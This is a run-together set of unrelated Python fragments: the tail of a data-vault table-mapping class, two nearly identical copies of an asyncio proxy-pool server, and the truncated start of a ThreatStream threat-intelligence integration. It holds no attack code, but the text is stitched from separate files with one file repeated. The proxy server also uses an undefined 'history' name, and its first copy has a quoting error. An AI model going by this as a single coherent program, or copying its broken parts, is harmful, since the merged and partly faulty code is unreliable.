source_column_mappings.from_table(source_table.schema, source_table.name) result = [ self._table_dict[f"{m['src_schema']}.{m['src_table']}"][m['src_column']] for m in source_column_mappings ] return result def source_column_object(self, target_column, source_table=None): source_columns = self.source_column_objects(target_column, source_table) if len(source_columns) > 0: return source_columns[0] else: return None def check(self, target_table): source_mappings = self.table_mappings.to_table(target_table.schema, target_table.name) source_table_names = ['{source_schema}.{source_table}'.format(**m) for m in source_mappings] if len(source_mappings) == 0: raise MetaDataError('There is no table mappings to {target_table_name}'.format( target_table_name=target_table.full_name )) source_tables = self.source_tables(target_table) if len(source_tables) == 0: raise MetaDataError('There is no column mappings to {target_table_name} from {source_table_names}'.format( target_table_name=target_table.full_name, source_table_names=', '.join(source_table_names) )) for target_column in target_table.columns: # print(target_column) if target_table.table_type in ['version_pointer']: src_columns = self.column_mappings.to_column(target_table.schema, target_table.name, target_column.name) if len(src_columns) < 1: raise MetaDataError(f'There is no mapping to {target_column.full_name}') else: for source_table in source_tables: # print(source_table.full_name) source_column = self.source_column(source_table, target_column) # print(source_column) if source_column == None: raise MetaDataError('There is no mapping to {target_column_name} from {source_table_name}'.format( target_column_name=target_column.full_name, source_table_name=source_table.full_name )) def path(self, vp): source_tables = set(l.full_name for l in self.source_tables(vp)) metrics_mapping = self.column_mappings.to_column(vp.schema, vp.name, vp.metrics_key.name)[0] context_mapping = self.column_mappings.to_column(vp.schema, vp.name, vp.context_key.name)[0] current_column = vp.parent[metrics_mapping['src_table']][metrics_mapping['src_column']] goal_column = vp.parent[context_mapping['src_table']][context_mapping['src_column']] # print('goal:', goal_column.full_name) path_ = [current_column] seen = set([current_column.full_name]) while current_column.full_name != goal_column.full_name: # print('current:', current_column.full_name) current_table = current_column.parent if current_table.table_type == 'hub': goals = [ sat.key for sat in current_table.related_satellites if sat.key.full_name not in seen and sat.key == goal_column ] if goals: current_column = goals[0] else: columns = [ fk.columns[0] for l in current_table.related_links for fk in l.fks if l.full_name in source_tables and fk.columns[0].full_name not in seen and fk.foreign_table_name == current_table.name ] if columns: current_column = columns[0] else: raise MetaDataError(f'No link from {current_column.full_name}') elif current_table.table_type == 'link': columns = [ (fk.foreign_columns[0], fk.columns[0]) for fk in current_table.fks if fk.columns[0].full_name not in seen and fk.foreign_table.full_name in source_tables ] if columns: (current_column, link_key) = columns[0] path_.append(link_key) seen.add(link_key.full_name) else: raise MetaDataError(f'No hub from {current_column.full_name}') elif current_table.table_type == 'satellite': current_column = current_table.related_hub[0].key else: raise MetaDataError(f'Wrong type, table={current_table} should not be in a vp path') path_.append(current_column) seen.add(current_column.full_name) return path_ def link_path(self, vp): link_columns = [c for c in self.path(vp) if c.parent.table_type == 'link'] grouped = [list(g) for _, g in groupby(link_columns, lambda c: c.parent.name)] return grouped
import asyncio import heapq import time from .errors import ( BadResponseError, BadStatusError, BadStatusLine, ErrorOnStream, NoProxyError, ProxyConnError, ProxyEmptyRecvError, ProxyRecvError, ProxySendError, ProxyTimeoutError, ResolveError, ) from .resolver import Resolver from .utils import log, parse_headers, parse_status_line CONNECTED = b'HTTP/1.1 200 Connection established\r\n\r\n' class ProxyPool: """Imports and gives proxies from queue on demand.""" def __init__( self, proxies, min_req_proxy=5, max_error_rate=0.5, max_resp_time=8, min_queue=5, strategy='best', ): self._proxies = proxies self._pool = [] self._newcomers = [] self._strategy = strategy self._min_req_proxy = min_req_proxy # if num of errors greater or equal 50% - proxy will be remove from pool self._max_error_rate = max_error_rate self._max_resp_time = max_resp_time self._min_queue = min_queue if strategy != 'best': raise ValueError('`strategy` only support `best` for now.') async def get(self, scheme): scheme = scheme.upper() if len(self._pool) + len(self._newcomers) < self._min_queue: chosen = await self._import(scheme) elif len(self._newcomers) > 0: chosen = self._newcomers.pop(0) elif self._strategy == 'best': for priority, proxy in self._pool: if scheme in proxy.schemes: chosen = proxy self._pool.remove((proxy.priority, proxy)) break else: chosen = await self._import(scheme) return chosen async def _import(self, expected_scheme): while True: proxy = await self._proxies.get() self._proxies.task_done() if not proxy: raise NoProxyError('No more available proxies') elif expected_scheme not in proxy.schemes: self.put(proxy) else: return proxy def put(self, proxy): is_exceed_time = (proxy.error_rate > self._max_error_rate) or ( proxy.avg_resp_time > self._max_resp_time ) if proxy.stat['requests'] < self._min_req_proxy: self._newcomers.append(proxy) elif proxy.stat['requests'] >= self._min_req_proxy and is_exceed_time: log.debug('%s:%d removed from proxy pool' % (proxy.host, proxy.port)) else: heapq.heappush(self._pool, (proxy.priority, proxy)) log.debug('%s:%d stat: %s' % (proxy.host, proxy.port, proxy.stat)) def remove(self, host, port): for proxy in self._newcomers: if proxy.host == host and proxy.port == port: chosen = proxy self._newcomers.remove(proxy) break else: for priority, proxy in self._pool: if proxy.host == host and proxy.port == port: chosen = proxy self._pool.remove((proxy.priority, proxy)) break return chosen class Server: """Server distributes incoming requests to a pool of found proxies.""" def __init__( self, host, port, proxies, timeout=8, max_tries=3, min_req_proxy=5, max_error_rate=0.5, max_resp_time=8, prefer_connect=False, http_allowed_codes=None, backlog=100, loop=None, **kwargs ): self.host = host self.port = int(port) self._loop = loop or asyncio.get_event_loop() self._timeout = timeout self._max_tries = max_tries self._backlog = backlog self._prefer_connect = prefer_connect self._server = None self._connections = {} self._proxy_pool = ProxyPool( proxies, min_req_proxy, max_error_rate, max_resp_time ) self._resolver = Resolver(loop=self._loop) self._http_allowed_codes = http_allowed_codes or [] def start(self): srv = asyncio.start_server( self._accept, host=self.host, port=self.port, backlog=self._backlog, loop=self._loop, ) self._server = self._loop.run_until_complete(srv) log.info( 'Listening established on {0}'.format( self._server.sockets[0].getsockname() ) ) def stop(self): if not self._server: return for conn in self._connections: if not conn.done(): conn.cancel() self._server.close() if not self._loop.is_running(): self._loop.run_until_complete(self._server.wait_closed()) # Time to close the running futures in self._connections self._loop.run_until_complete(asyncio.sleep(0.5)) self._server = None self._loop.stop() log.info('Server is stopped') def _accept(self, client_reader, client_writer): def _on_completion(f): reader, writer = self._connections.pop(f) writer.close() log.debug('client: %d; closed' % id(client_reader)) try: exc = f.exception() except asyncio.CancelledError: log.debug('CancelledError in server._handle:_on_completion') exc = None if exc: if isinstance(exc, NoProxyError): self.stop() else: raise exc f = asyncio.ensure_future(self._handle(client_reader, client_writer)) f.add_done_callback(_on_completion) self._connections[f] = (client_reader, client_writer) async def _handle(self, client_reader, client_writer): log.debug( 'Accepted connection from %s' % (client_writer.get_extra_info('peername'),) ) request, headers = await self._parse_request(client_reader) scheme = self._identify_scheme(headers) client = id(client_reader) log.debug( 'client: %d; request: %s; headers: %s; scheme: %s' % (client, request, headers, scheme) ) # API for controlling proxybroker2 if headers['Host'] == 'proxycontrol': _api, _operation, _params = headers['Path'].split('/', 5)[3:] if _api == 'api': if _operation == 'remove': proxy_host, proxy_port = _params.split(':', 1) self._proxy_pool.remove(proxy_host, int(proxy_port)) log.debug( 'Remove Proxy: client: %d; request: %s; headers: %s; scheme: %s; proxy_host: %s; proxy_port: %s' % (client, request, headers, scheme, proxy_host, proxy_port) ) client_writer.write(b'HTTP/1.1 204 No Content\r\n\r\n') await client_writer.drain() return elif _operation == 'history': query_type, url = _params.split(':', 1) if query_type == 'url': previous_proxy = history.get( f"{client_reader._transport.get_extra_info("peername")[0]}-{url}" ) if previous_proxy is None: client_writer.write(b'HTTP/1.1 204 No Content\r\n\r\n') await client_writer.drain() return else: previous_proxy_bytestring = ( '{"proxy": "%s"}' % previous_proxy ).encode() client_writer.write(b'HTTP/1.1 200 OK\r\n') client_writer.write(b'Content-Type: application/json\r\n') client_writer.write( f"Content-Length: {str(len(previous_proxy_bytestring) + 2).encode()}\r\n" ) client_writer.write(b'Access-Control-Allow-Origin: *\r\n') client_writer.write( b'Access-Control-Allow-Credentials: true\r\n\r\n' ) client_writer.write(previous_proxy_bytestring + b'\r\n') await client_writer.drain() return for attempt in range(self._max_tries): stime, err = 0, None proxy = await self._proxy_pool.get(scheme) proto = self._choice_proto(proxy, scheme) log.debug( 'client: %d; attempt: %d; proxy: %s; proto: %s' % (client, attempt, proxy, proto) ) try: await proxy.connect() if proto in ('CONNECT:80', 'SOCKS4', 'SOCKS5'): host = headers.get('Host') port = headers.get('Port', 80) try: ip = await self._resolver.resolve(host) except ResolveError: return proxy.ngtr = proto await proxy.ngtr.negotiate(host=host, port=port, ip=ip) if scheme == 'HTTPS' and proto in ('SOCKS4', 'SOCKS5'): client_writer.write(CONNECTED) await client_writer.drain() else: # HTTP await proxy.send(request) else: # proto: HTTP & HTTPS await proxy.send(request) stime = time.time() stream = [ asyncio.ensure_future( self._stream(reader=client_reader, writer=proxy.writer) ), asyncio.ensure_future( self._stream( reader=proxy.reader, writer=client_writer, scheme=scheme, ) ), ] await asyncio.gather(*stream, loop=self._loop) except asyncio.CancelledError: log.debug('Cancelled in server._handle') break except ( ProxyTimeoutError, ProxyConnError, ProxyRecvError, ProxySendError, ProxyEmptyRecvError, BadStatusError, BadResponseError, ) as e: log.debug('client: %d; error: %r' % (client, e)) continue except ErrorOnStream as e: log.debug( 'client: %d; error: %r; EOF: %s' % (client, e, client_reader.at_eof()) ) for task in stream: if not task.done(): task.cancel() if client_reader.at_eof() and 'Timeout' in repr(e): # Proxy may not be able to receive EOF and weel be raised a # TimeoutError, but all the data has already successfully # returned, so do not consider this error of proxy break err = e if scheme == 'HTTPS': # SSL Handshake probably failed break else: break finally: proxy.log(request.decode(), stime, err=err) proxy.close() self._proxy_pool.put(proxy) async def _parse_request(self, reader, length=65536): request = await reader.read(length) headers = parse_headers(request) if headers['Method'] == 'POST' and request.endswith(b'\r\n\r\n'): # For aiohttp. POST data returns on second reading request += await reader.read(length) return request, headers def _identify_scheme(self, headers): if headers['Method'] == 'CONNECT': return 'HTTPS' else: return 'HTTP' def _choice_proto(self, proxy, scheme): if scheme == 'HTTP': if self._prefer_connect and ('CONNECT:80' in proxy.types): proto = 'CONNECT:80' else: relevant = { 'HTTP', 'CONNECT:80', 'SOCKS4', 'SOCKS5', } & proxy.types.keys() proto = relevant.pop() else: # HTTPS relevant = {'HTTPS', 'SOCKS4', 'SOCKS5'} & proxy.types.keys() proto = relevant.pop() return proto async def _stream(self, reader, writer, length=65536, scheme=None): checked = False try: while not reader.at_eof(): data = await asyncio.wait_for( reader.read(length), self._timeout ) if not data: writer.close() break elif scheme and not checked: self._check_response(data, scheme) checked = True writer.write(data) await writer.drain() except ( asyncio.TimeoutError, ConnectionResetError, OSError, ProxyRecvError, BadStatusError, BadResponseError, ) as e: raise ErrorOnStream(e) def _check_response(self, data, scheme): if scheme == 'HTTP' and self._http_allowed_codes: line = data.split(b'\r\n', 1)[0].decode() try: header = parse_status_line(line) except BadStatusLine: raise BadResponseError if header['Status'] not in self._http_allowed_codes: raise BadStatusError( '%r not in %r' % (header['Status'], self._http_allowed_codes) )
import asyncio import heapq import time from .errors import ( BadResponseError, BadStatusError, BadStatusLine, ErrorOnStream, NoProxyError, ProxyConnError, ProxyEmptyRecvError, ProxyRecvError, ProxySendError, ProxyTimeoutError, ResolveError, ) from .resolver import Resolver from .utils import log, parse_headers, parse_status_line CONNECTED = b'HTTP/1.1 200 Connection established\r\n\r\n' class ProxyPool: """Imports and gives proxies from queue on demand.""" def __init__( self, proxies, min_req_proxy=5, max_error_rate=0.5, max_resp_time=8, min_queue=5, strategy='best', ): self._proxies = proxies self._pool = [] self._newcomers = [] self._strategy = strategy self._min_req_proxy = min_req_proxy # if num of errors greater or equal 50% - proxy will be remove from pool self._max_error_rate = max_error_rate self._max_resp_time = max_resp_time self._min_queue = min_queue if strategy != 'best': raise ValueError('`strategy` only support `best` for now.') async def get(self, scheme): scheme = scheme.upper() if len(self._pool) + len(self._newcomers) < self._min_queue: chosen = await self._import(scheme) elif len(self._newcomers) > 0: chosen = self._newcomers.pop(0) elif self._strategy == 'best': for priority, proxy in self._pool: if scheme in proxy.schemes: chosen = proxy self._pool.remove((proxy.priority, proxy)) break else: chosen = await self._import(scheme) return chosen async def _import(self, expected_scheme): while True: proxy = await self._proxies.get() self._proxies.task_done() if not proxy: raise NoProxyError('No more available proxies') elif expected_scheme not in proxy.schemes: self.put(proxy) else: return proxy def put(self, proxy): is_exceed_time = (proxy.error_rate > self._max_error_rate) or ( proxy.avg_resp_time > self._max_resp_time ) if proxy.stat['requests'] < self._min_req_proxy: self._newcomers.append(proxy) elif proxy.stat['requests'] >= self._min_req_proxy and is_exceed_time: log.debug('%s:%d removed from proxy pool' % (proxy.host, proxy.port)) else: heapq.heappush(self._pool, (proxy.priority, proxy)) log.debug('%s:%d stat: %s' % (proxy.host, proxy.port, proxy.stat)) def remove(self, host, port): for proxy in self._newcomers: if proxy.host == host and proxy.port == port: chosen = proxy self._newcomers.remove(proxy) break else: for priority, proxy in self._pool: if proxy.host == host and proxy.port == port: chosen = proxy self._pool.remove((proxy.priority, proxy)) break return chosen class Server: """Server distributes incoming requests to a pool of found proxies.""" def __init__( self, host, port, proxies, timeout=8, max_tries=3, min_req_proxy=5, max_error_rate=0.5, max_resp_time=8, prefer_connect=False, http_allowed_codes=None, backlog=100, loop=None, **kwargs ): self.host = host self.port = int(port) self._loop = loop or asyncio.get_event_loop() self._timeout = timeout self._max_tries = max_tries self._backlog = backlog self._prefer_connect = prefer_connect self._server = None self._connections = {} self._proxy_pool = ProxyPool( proxies, min_req_proxy, max_error_rate, max_resp_time ) self._resolver = Resolver(loop=self._loop) self._http_allowed_codes = http_allowed_codes or [] def start(self): srv = asyncio.start_server( self._accept, host=self.host, port=self.port, backlog=self._backlog, loop=self._loop, ) self._server = self._loop.run_until_complete(srv) log.info( 'Listening established on {0}'.format( self._server.sockets[0].getsockname() ) ) def stop(self): if not self._server: return for conn in self._connections: if not conn.done(): conn.cancel() self._server.close() if not self._loop.is_running(): self._loop.run_until_complete(self._server.wait_closed()) # Time to close the running futures in self._connections self._loop.run_until_complete(asyncio.sleep(0.5)) self._server = None self._loop.stop() log.info('Server is stopped') def _accept(self, client_reader, client_writer): def _on_completion(f): reader, writer = self._connections.pop(f) writer.close() log.debug('client: %d; closed' % id(client_reader)) try: exc = f.exception() except asyncio.CancelledError: log.debug('CancelledError in server._handle:_on_completion') exc = None if exc: if isinstance(exc, NoProxyError): self.stop() else: raise exc f = asyncio.ensure_future(self._handle(client_reader, client_writer)) f.add_done_callback(_on_completion) self._connections[f] = (client_reader, client_writer) async def _handle(self, client_reader, client_writer): log.debug( 'Accepted connection from %s' % (client_writer.get_extra_info('peername'),) ) request, headers = await self._parse_request(client_reader) scheme = self._identify_scheme(headers) client = id(client_reader) log.debug( 'client: %d; request: %s; headers: %s; scheme: %s' % (client, request, headers, scheme) ) # API for controlling proxybroker2 if headers['Host'] == 'proxycontrol': _api, _operation, _params = headers['Path'].split('/', 5)[3:] if _api == 'api': if _operation == 'remove': proxy_host, proxy_port = _params.split(':', 1) self._proxy_pool.remove(proxy_host, int(proxy_port)) log.debug( 'Remove Proxy: client: %d; request: %s; headers: %s; scheme: %s; proxy_host: %s; proxy_port: %s' % (client, request, headers, scheme, proxy_host, proxy_port) ) client_writer.write(b'HTTP/1.1 204 No Content\r\n\r\n') await client_writer.drain() return elif _operation == 'history': query_type, url = _params.split(':', 1) if query_type == 'url': previous_proxy = history.get( f"{client_reader._transport.get_extra_info('peername')[0]}-{url}" ) if previous_proxy is None: client_writer.write(b'HTTP/1.1 204 No Content\r\n\r\n') await client_writer.drain() return else: previous_proxy_bytestring = ( '{"proxy": "%s"}' % previous_proxy ).encode() client_writer.write(b'HTTP/1.1 200 OK\r\n') client_writer.write(b'Content-Type: application/json\r\n') client_writer.write( f"Content-Length: {str(len(previous_proxy_bytestring) + 2).encode()}\r\n" ) client_writer.write(b'Access-Control-Allow-Origin: *\r\n') client_writer.write( b'Access-Control-Allow-Credentials: true\r\n\r\n' ) client_writer.write(previous_proxy_bytestring + b'\r\n') await client_writer.drain() return for attempt in range(self._max_tries): stime, err = 0, None proxy = await self._proxy_pool.get(scheme) proto = self._choice_proto(proxy, scheme) log.debug( 'client: %d; attempt: %d; proxy: %s; proto: %s' % (client, attempt, proxy, proto) ) try: await proxy.connect() if proto in ('CONNECT:80', 'SOCKS4', 'SOCKS5'): host = headers.get('Host') port = headers.get('Port', 80) try: ip = await self._resolver.resolve(host) except ResolveError: return proxy.ngtr = proto await proxy.ngtr.negotiate(host=host, port=port, ip=ip) if scheme == 'HTTPS' and proto in ('SOCKS4', 'SOCKS5'): client_writer.write(CONNECTED) await client_writer.drain() else: # HTTP await proxy.send(request) else: # proto: HTTP & HTTPS await proxy.send(request) stime = time.time() stream = [ asyncio.ensure_future( self._stream(reader=client_reader, writer=proxy.writer) ), asyncio.ensure_future( self._stream( reader=proxy.reader, writer=client_writer, scheme=scheme, ) ), ] await asyncio.gather(*stream, loop=self._loop) except asyncio.CancelledError: log.debug('Cancelled in server._handle') break except ( ProxyTimeoutError, ProxyConnError, ProxyRecvError, ProxySendError, ProxyEmptyRecvError, BadStatusError, BadResponseError, ) as e: log.debug('client: %d; error: %r' % (client, e)) continue except ErrorOnStream as e: log.debug( 'client: %d; error: %r; EOF: %s' % (client, e, client_reader.at_eof()) ) for task in stream: if not task.done(): task.cancel() if client_reader.at_eof() and 'Timeout' in repr(e): # Proxy may not be able to receive EOF and weel be raised a # TimeoutError, but all the data has already successfully # returned, so do not consider this error of proxy break err = e if scheme == 'HTTPS': # SSL Handshake probably failed break else: break finally: proxy.log(request.decode(), stime, err=err) proxy.close() self._proxy_pool.put(proxy) async def _parse_request(self, reader, length=65536): request = await reader.read(length) headers = parse_headers(request) if headers['Method'] == 'POST' and request.endswith(b'\r\n\r\n'): # For aiohttp. POST data returns on second reading request += await reader.read(length) return request, headers def _identify_scheme(self, headers): if headers['Method'] == 'CONNECT': return 'HTTPS' else: return 'HTTP' def _choice_proto(self, proxy, scheme): if scheme == 'HTTP': if self._prefer_connect and ('CONNECT:80' in proxy.types): proto = 'CONNECT:80' else: relevant = { 'HTTP', 'CONNECT:80', 'SOCKS4', 'SOCKS5', } & proxy.types.keys() proto = relevant.pop() else: # HTTPS relevant = {'HTTPS', 'SOCKS4', 'SOCKS5'} & proxy.types.keys() proto = relevant.pop() return proto async def _stream(self, reader, writer, length=65536, scheme=None): checked = False try: while not reader.at_eof(): data = await asyncio.wait_for( reader.read(length), self._timeout ) if not data: writer.close() break elif scheme and not checked: self._check_response(data, scheme) checked = True writer.write(data) await writer.drain() except ( asyncio.TimeoutError, ConnectionResetError, OSError, ProxyRecvError, BadStatusError, BadResponseError, ) as e: raise ErrorOnStream(e) def _check_response(self, data, scheme): if scheme == 'HTTP' and self._http_allowed_codes: line = data.split(b'\r\n', 1)[0].decode() try: header = parse_status_line(line) except BadStatusLine: raise BadResponseError if header['Status'] not in self._http_allowed_codes: raise BadStatusError( '%r not in %r' % (header['Status'], self._http_allowed_codes) )
import emoji import demistomock as demisto from CommonServerPython import * import traceback REPUTATION_COMMANDS = ['ip', 'domain', 'file', 'url', 'threatstream-email-reputation'] # Disable insecure warnings requests.packages.urllib3.disable_warnings() ''' GLOBALS/PARAMS ''' THREAT_STREAM = 'ThreatStream' NO_INDICATORS_FOUND_MSG = 'No intelligence has been found for {searchable_value}' DEFAULT_MALICIOUS_THRESHOLD = 65 DEFAULT_SUSPICIOUS_THRESHOLD = 25 HEADERS = { 'Content-Type': 'application/json' } IOC_ARGS_TO_INDICATOR_KEY_MAP = { 'domain': { 'domain': 'value', 'dns': 'ip', 'organization': 'org', 'traffic_light_protocol': 'tlp', 'geo_country': 'country', 'creation_date': 'created_ts', 'updated_date': 'modified_ts', 'registrant_name': 'meta.registrant_name', 'registrant_email': 'meta.registrant_email', 'registrant_phone': 'meta.registrant_phone' }, 'url': { 'url': 'value', 'asn': 'asn', 'organization': 'org', 'geo_country': 'country', 'traffic_light_protocol': 'tlp' }, 'ip': { 'ip': 'value', 'asn': 'asn', 'geo_latitude': 'latitude', 'geo_longitude': 'longitude', 'geo_country': 'country', 'traffic_light_protocol': 'tlp' }, 'file': { 'organization': 'org', 'traffic_light_protocol': 'tlp' } } DEFAULT_INDICATOR_MAPPING = { 'asn': 'ASN', 'value': 'Address', 'country': 'Country', 'type': 'Type', 'modified_ts': 'Modified', 'confidence': 'Confidence', 'status': 'Status', 'org': 'Organization', 'source': 'Source', 'tags': 'Tags', } FILE_INDICATOR_MAPPING = { 'modified_ts': 'Modified', 'confidence': 'Confidence', 'status': 'Status', 'source': 'Source', 'subtype': 'Type', 'tags': 'Tags' } INDICATOR_EXTENDED_MAPPING = { 'Value': 'value', 'ID': 'id', 'IType': 'itype', 'Confidence': 'confidence', 'Country': 'country', 'Organization': 'org', 'ASN': 'asn', 'Status': 'status', 'Tags': 'tags', 'Modified': 'modified_ts', 'Source': 'source', 'Type': 'type', 'Severity': 'severity' } RELATIONSHIPS_MAPPING = { 'ip': [ { 'name': EntityRelationship.Relationships.RESOLVES_TO, 'raw_field': 'rdns', 'entity_b_type': FeedIndicatorType.Domain }, { 'name': EntityRelationship.Relationships.INDICATOR_OF, 'raw_field': 'meta.maltype', 'entity_b_type': 'Malware' } ], 'domain': [ { 'name': EntityRelationship.Relationships.RESOLVED_FROM, 'raw_field': 'ip', 'entity_b_type': FeedIndicatorType.IP }, { 'name': EntityRelationship.Relationships.INDICATOR_OF, 'raw_field': 'meta.maltype', 'entity_b_type': 'Malware' } ], 'url': [ { 'name': EntityRelationship.Relationships.RESOLVED_FROM, 'raw_field': 'ip', 'entity_b_type': FeedIndicatorType.IP }, { 'name': EntityRelationship.Relationships.INDICATOR_OF, 'raw_field': 'meta.maltype', 'entity_b_type': 'Malware' } ], 'file': [ { 'name': EntityRelationship.Relationships.INDICATOR_OF, 'raw_field': 'meta.maltype', 'entity_b_type': 'Malware' } ], 'email': [ { 'name': EntityRelationship.Relationships.INDICATOR_OF, 'raw_field': 'meta.maltype', 'entity_b_type': 'Malware' } ] } ''' HELPER FUNCTIONS ''' class Client(BaseClient): def __init__(self, base_url, user_name, api_key, verify, proxy, reliability, should_create_relationships): super().__init__(base_url=base_url, verify=verify, proxy=proxy, ok_codes=(200, 201, 202)) self.reliability = reliability self.should_create_relationships = should_create_relationships self.credentials = { 'username': user_name, 'api_key': api_key } def http_request(self, method, url_suffix, params=None, data=None, headers=None, files=None, json=None, resp_type='json'): """ A wrapper for requests lib to send our requests and handle requests and responses better. """ params = params or {} params.update(self.credentials) res = super()._http_request( method=method, url_suffix=url_suffix, headers=headers, params=params, data=data, json_data=json, files=files, resp_type=resp_type, error_handler=self.error_handler, ) return res def error_handler(self, res: requests.Response): """ Error handler to call by super().http_request in case an error was occurred """ # Handle error responses gracefully if res.status_code == 401: raise DemistoException(f"{THREAT_STREAM} - Got unauthorized from the server. Check the credentials.") elif res.status_code in {404}: command = demisto.command() if command in ['threatstream-get-model-description', 'threatstream-get-indicators-by-model', 'threatstream-get-analysis-status', 'threatstream-analysis-report']: # in order to prevent raising en error in case model/indicator/report was not found return else: raise DemistoException(f"{THREAT_STREAM} - The resource was not found.") raise DemistoException(F"{THREAT_STREAM} - Error in API call {res.status_code} - {res.text}") class DBotScoreCalculator: """ Class for DBot score calculation based on thresholds and confidence """ def __init__(self, params: Dict): self.instance_defined_thresholds = { DBotScoreType.IP: arg_to_number(params.get('ip_threshold')), DBotScoreType.URL: arg_to_number(params.get('url_threshold')), DBotScoreType.FILE: arg_to_number(params.get('file_threshold')), DBotScoreType.DOMAIN: arg_to_number(params.get('domain_threshold')), DBotScoreType.EMAIL: arg_to_number(params.get('email_threshold')), } def calculate_score(self, ioc_type: str, indicator, threshold=None): """ Calculate the DBot score according the indicator's confidence and thresholds if exist """ # in case threshold was defined in the instance or passed as argument # we have only two scores levels - malicious or good # if threshold wasn't defined we have three score levels malicious suspicious and good confidence = indicator.get('confidence', Common.DBotScore.NONE) defined_threshold = threshold or self.instance_defined_thresholds.get(ioc_type) if defined_threshold: return Common.DBotScore.BAD if confidence >= defined_threshold else Common.DBotScore.GOOD else: if confidence > DEFAULT_MALICIOUS_THRESHOLD: return Common.DBotScore.BAD if confidence > DEFAULT_SUSPICIOUS_THRESHOLD: return Common.DBotScore.SUSPICIOUS else: return Common.DBotScore.GOOD def find_worst_indicator(indicators): """ Sorts list of indicators by confidence score and returns one indicator with the highest confidence. In case the indicator has no confidence value, the indicator score is set to 0 (NONE). """ indicators.sort(key=lambda ioc: ioc.get('confidence', Common.DBotScore.NONE), reverse=True) return indicators[0] def prepare_args(args, command, params): # removing empty keys that can be passed from playbook input args = {k: v for (k, v) in args.items() if v} # special handling for ip, domain, file, url and threatstream-email-reputation commands if command in REPUTATION_COMMANDS: default_include_inactive = params.get('include_inactive', False) include_inactive = argToBoolean(args.pop('include_inactive', default_include_inactive)) args['status'] = "active,inactive" if include_inactive else "active" if 'threshold' in args: args['threshold'] = arg_to_number(args['threshold']) # special handling for threatstream-get-indicators if 'indicator_severity' in args: args['meta.severity'] = args.pop('indicator_severity', None) if 'tags_name' in args: args['tags.name'] = args.pop('tags_name', None) if 'indicator_value' in args: args['value'] = args.pop('indicator_value', None) return args def get_tags(indicator): """ Return list of the indicator's tags threat_type and maltype """ tags = [] for key in ['meta.maltype', 'threat_type']: val = demisto.get(indicator, key) if val: tags.append(val) indicator_tags = indicator.get('tags', []) if indicator_tags: tags.extend([str(tag.get('name', '')) for tag in indicator_tags]) return tags def search_worst_indicator_by_params(client: Client, params): """ Generic function that searches for indicators from ThreatStream by given query string. Returns indicator with the highest confidence score. """ indicators_data = client.http_request("Get", "v2/intelligence/", params=params) if not indicators_data['objects']: return None return find_worst_indicator(indicators_data['objects']) def get_generic_threat_context(indicator, indicator_mapping=DEFAULT_INDICATOR_MAPPING): """ Receives indicator and builds new dictionary from values that were defined in DEFAULT_INDICATOR_MAPPING keys and adds the Severity key with indicator severity value. """ context = {indicator_mapping[k]: v for (k, v) in indicator.items() if k in indicator_mapping.keys()} context['Tags'] = get_tags(indicator) context['Severity'] = demisto.get(indicator, 'meta.severity') or 'low' return context def parse_network_elem(element_list, context_prefix): """ Parses the network elements list and returns a new dictionary. """ return list(map(lambda e: { F'{context_prefix}Source': e.get('src', ''), F'{context_prefix}Destination': e.get('dst', ''), F'{context_prefix}Port': e.get('dport', ''), }, element_list)) def parse_network_lists(network): """ Parses the network part that was received from sandbox report json. In each list, only sublist of 10 elements is taken. """ hosts = [{'Hosts': h} for h in network.get('hosts', [])[:10]] if 'packets' in network: network = network['packets'] udp_list = parse_network_elem(network.get('udp', [])[:10], 'Udp') icmp_list = parse_network_elem(network.get('icmp', [])[:10], 'Icmp') tcp_list = parse_network_elem(network.get('tcp', [])[:10], 'Tcp') http_list = parse_network_elem(network.get('http', [])[:10], 'Http') https_list = parse_network_elem(network.get('https', [])[:10], 'Https') network_result = udp_list + icmp_list + tcp_list + http_list + https_list + hosts return network_result def parse_info(info): """ Parses the info part that was received from sandbox report json """ info.update(info.pop('machine', {})) parsed_info = { 'Category': info.get('category', '').title(), 'Started': info.get('started', ''), 'Completed': info.get('ended', ''), 'Duration': info.get('duration', ''), 'VmName': info.get('name', ''), 'VmID': info.get('id', '') } return parsed_info def parse_indicators_list(iocs_list): """ Parses the indicator list and returns dictionary that will be set to context. """ iocs_context = [] for indicator in iocs_list: if indicator.get('type', '') == 'md5': indicator['type'] = indicator.get('subtype', '') indicator['severity'] = demisto.get(indicator, 'meta.severity') or 'low' tags = indicator.get('tags') or [] indicator['tags'] = ",".join(tag.get('name', '') for tag in tags) iocs_context.append({key: indicator.get(ioc_key) for (key, ioc_key) in INDICATOR_EXTENDED_MAPPING.items()}) return iocs_context def build_model_data(model, name, is_public, tlp, tags, intelligence, description): """ Builds data dictionary that is used in Threat Model creation/update request. """ if model == 'tipreport': description_field_name = 'body' else: description_field_name = 'description' data = {k: v for (k, v) in (('name', name), ('is_public', is_public), ('tlp', tlp), (description_field_name, description)) if v} if tags: data['tags'] = tags if isinstance(tags, list) else [t.strip() for t in tags.split(',')] if intelligence: data['intelligence'] = intelligence if isinstance(intelligence, list) else [i.strip() for i in intelligence.split(',')] return data def create_relationships(client: Client, indicator, ioc_type, relation_mapper): relationships: List[EntityRelationship] = [] if not client.should_create_relationships: return relationships for relation in relation_mapper: entity_b = demisto.get(indicator, relation['raw_field']) if entity_b: relationships.append(EntityRelationship(entity_a=indicator['value'], entity_a_type=ioc_type, name=relation['name'], entity_b=entity_b, entity_b_type=relation['entity_b_type'], source_reliability=client.reliability, brand=THREAT_STREAM)) return relationships ''' COMMANDS + REQUESTS FUNCTIONS ''' def test_module(client: Client): """ Performs basic get request to get item samples """ client.http_request('GET', 'v2/intelligence/', params=dict(limit=1)) return 'ok' def ips_reputation_command(client: Client, score_calc: DBotScoreCalculator, ip, status, threshold=None): results = [] # type: ignore ips = argToList(ip, ',') for single_ip in ips: results.append(get_ip_reputation(client, score_calc, single_ip, status, threshold)) return results def get_ip_reputation(client: Client, score_calc: DBotScoreCalculator, ip, status, threshold=None): """ Checks the reputation of given ip from ThreatStream and returns the indicator with highest confidence score. """ # get the indicator params = { 'value': ip, 'type': DBotScoreType.IP, 'status': status, 'limit': 0, } indicator = search_worst_indicator_by_params(client, params) if not indicator: return NO_INDICATORS_FOUND_MSG.format(searchable_value=ip) # Convert the tags objects into s string for the human readable. threat_context = get_generic_threat_context(indicator) tags_csv = ', '.join(threat_context.get('Tags', [])) human_readable = tableToMarkdown(f'IP reputation for: {ip}', threat_context | dict(Tags=tags_csv)) # build relationships relationships = create_relationships( client, indicator, FeedIndicatorType.IP, RELATIONSHIPS_MAPPING.get('ip'), ) # create the IP instance args_to_keys_map: Dict[str, str] = IOC_ARGS_TO_INDICATOR_KEY_MAP.get('ip') # type: ignore kwargs = {arg: demisto.get(indicator, key) for (arg, key) in 